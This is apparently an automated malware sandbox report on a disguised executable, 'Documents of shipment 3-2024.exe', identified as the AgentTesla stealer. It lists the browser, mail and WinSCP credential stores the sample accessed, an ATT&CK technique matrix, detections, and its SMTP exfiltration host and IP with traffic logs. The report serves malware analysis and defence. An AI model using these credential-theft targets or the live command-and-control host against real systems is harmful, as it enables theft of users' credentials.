                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.374f338.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Documents of shipment 3-2024.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.374f338.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2487661512.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2487661512.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2487661512.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents of shipment 3-2024.exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Documents of shipment 3-2024.exe PID: 7644, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.374f338.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Documents of shipment 3-2024.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.374f338.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2487661512.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents of shipment 3-2024.exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Documents of shipment 3-2024.exe PID: 7644, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.374f338.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Documents of shipment 3-2024.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.3789d58.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Documents of shipment 3-2024.exe.374f338.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2487661512.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2487661512.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2487661512.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documents of shipment 3-2024.exe PID: 7472, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Documents of shipment 3-2024.exe PID: 7644, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      111
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      Input Capture
                      1
                      Process Discovery
                      Remote Desktop Protocol1
                      Input Capture
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                      Virtualization/Sandbox Evasion
                      1
                      Credentials in Registry
                      141
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin Shares11
                      Archive Collected Data
                      1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                      Process Injection
                      NTDS1
                      Application Window Discovery
                      Distributed Component Object Model1
                      Data from Local System
                      11
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain Credentials24
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                      Software Packing
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Documents of shipment 3-2024.exe50%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                      Documents of shipment 3-2024.exe68%VirustotalBrowse
                      Documents of shipment 3-2024.exe100%AviraHEUR/AGEN.1326958
                      Documents of shipment 3-2024.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      mail.elec-qatar.com2%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://mail.elec-qatar.com0%Avira URL Cloudsafe
                      http://mail.elec-qatar.com2%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.elec-qatar.com
                      50.87.139.143
                      truetrueunknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://mail.elec-qatar.comDocuments of shipment 3-2024.exe, 00000003.00000002.2487661512.00000000031F6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://account.dyn.com/Documents of shipment 3-2024.exe, 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, Documents of shipment 3-2024.exe, 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        50.87.139.143
                        mail.elec-qatar.comUnited States
                        46606UNIFIEDLAYER-AS-1UStrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1408242
                        Start date and time:2024-03-13 14:23:49 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 22s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Documents of shipment 3-2024.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 194
                        • Number of non-executed functions: 10
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        14:24:36API Interceptor22x Sleep call for process: Documents of shipment 3-2024.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        50.87.139.143SHIPPING DOC.exeGet hashmaliciousAgentTeslaBrowse
                          Order 19A20060.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                          z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            mail.elec-qatar.comSHIPPING DOC.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.139.143
                                            Order 19A20060.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            Proforma Invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            SHIPPING DOC.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            New order.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            Quotation R2100131410.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            SecuriteInfo.com.Trojan.MSIL.Krypt.2433.31957.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.139.143
                                            z92BankingDetails.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.139.143
                                            z14Paymentslip.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.139.143
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            UNIFIEDLAYER-AS-1USSHIPPING DOC.exeGet hashmaliciousAgentTeslaBrowse
                                            • 50.87.139.143
                                            http://a.email8.westpac.com.au/?qqd8UFJGTiJENtWiy-VcqIDuBHhkRyDMq&//conventosp.com.br/wp-includes/pomo/DOms/Franconette@dfl.ieGet hashmaliciousUnknownBrowse
                                            • 216.172.160.199
                                            063837646WAYBILLMAR24.exeGet hashmaliciousRedLineBrowse
                                            • 162.144.32.209
                                            DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.215.168.66
                                            PO -70611.bat.exeGet hashmaliciousAgentTeslaBrowse
                                            • 192.185.16.97
                                            5059367692.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.253.239
                                            http://a.email8.westpac.com.au/?qqd8UFJGTiJENtWiy-VcqIDuBHhkRyDMq&//mountainspeak.ca/tmp/pxp/mbu/a.b@mbu.eduGet hashmaliciousHTMLPhisherBrowse
                                            • 216.172.172.184
                                            https://funkmonsters.com/hjsdfwex/hjsahealthy/hjsahealthy/c3BlZWRwZXJrc0BhZHZhbmNlLWF1dG8uY29tGet hashmaliciousUnknownBrowse
                                            • 162.241.124.47
                                            https://tracker.club-os.com/campaign/click?msgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=jehufelfledelrisco.com/@a/jehufelfledelrisco.com/hr@jehufelfledelrisco.comGet hashmaliciousHTMLPhisherBrowse
                                            • 162.240.41.48
                                            https://indd.adobe.com/view/b6974824-548c-4a56-9b4e-2262d37bb22fGet hashmaliciousUnknownBrowse
                                            • 192.185.24.249
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\Documents of shipment 3-2024.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.98514165855363
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Documents of shipment 3-2024.exe
                                            File size:731'648 bytes
                                            MD5:779222c4ace4e7726fc76dedb4394b77
                                            SHA1:da183b07419ffb0fa4b72230cf540e8a09c64a65
                                            SHA256:664db26a69e4b1efb10289189887c35558bf7ca966eed02f97e523fef83f1205
                                            SHA512:b94ce6cba6aef492335628dc2456f3e7457e5f23ad646c5aa0b9464c9995f9bcd1df206d9d7563c7870566fac104eaaf900677f725041f197773f5d57248e5d0
                                            SSDEEP:12288:3fHwgqPPhZakohW1yCuTuFBQNfLTiYCDLxBAaOWHMoMYw6WsviE8O1QX9zXiUvlJ:fqajgsCuTSBefLTVn5SMYw6WsqE8T9zB
                                            TLSH:24F423EAC42DB437C1B909B8F847560253F16D75B021D6DA8E8239D92EE035B528FF27
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."b.e................. ...........>... ...@....@.. ....................................@................................
                                            Icon Hash:90cececece8e8eb0
                                            Entrypoint:0x4b3ea6
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x65F16222 [Wed Mar 13 08:21:54 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb3e4c0x57.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x570.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xb1eac0xb2000258be1690920aef99e3830909da82a84False0.9817306004213483data7.988555037607642IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xb40000x5700x6008d17d44fbc11975ce61388c89b7900a7False0.4192708333333333data4.47083371339975IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xb60000xc0x200325a3bb3c6c855c387f11af20faa25daFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xb40a00x31cdata0.4371859296482412
                                            RT_MANIFEST0xb43bc0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385
                                            DLLImport
                                            mscoree.dll_CorExeMain
                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            03/13/24-14:24:42.198173TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49707587192.168.2.1050.87.139.143
                                            03/13/24-14:24:42.198173TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49707587192.168.2.1050.87.139.143
                                            03/13/24-14:24:42.198173TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49707587192.168.2.1050.87.139.143
                                            03/13/24-14:24:42.198173TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249707587192.168.2.1050.87.139.143
                                            03/13/24-14:24:42.198070TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49707587192.168.2.1050.87.139.143
                                            03/13/24-14:24:42.198070TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49707587192.168.2.1050.87.139.143
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 13, 2024 14:24:40.314382076 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:40.487894058 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:40.487981081 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:40.930562019 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:40.931642056 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:41.105228901 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:41.106221914 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:41.280066967 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:41.280976057 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:41.494463921 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:41.626506090 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:41.626760960 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:41.800048113 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:41.800117016 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:41.800344944 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:42.015531063 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:42.023382902 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:42.023531914 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:42.197031975 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:42.197254896 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:42.198070049 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:42.198173046 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:42.198218107 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:42.198270082 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:24:42.371506929 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:42.371757984 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:42.373305082 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:24:42.428792000 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:26:20.147953987 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:26:20.362382889 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:26:20.522722960 CET5874970750.87.139.143192.168.2.10
                                            Mar 13, 2024 14:26:20.522852898 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:26:20.523017883 CET49707587192.168.2.1050.87.139.143
                                            Mar 13, 2024 14:26:20.696252108 CET5874970750.87.139.143192.168.2.10
                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 13, 2024 14:24:40.124645948 CET5140953192.168.2.101.1.1.1
                                            Mar 13, 2024 14:24:40.298741102 CET53514091.1.1.1192.168.2.10
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Mar 13, 2024 14:24:40.124645948 CET192.168.2.101.1.1.10xf43cStandard query (0)mail.elec-qatar.comA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Mar 13, 2024 14:24:40.298741102 CET1.1.1.1192.168.2.100xf43cNo error (0)mail.elec-qatar.com50.87.139.143A (IP address)IN (0x0001)false
                                            TimestampSource PortDest PortSource IPDest IPCommands
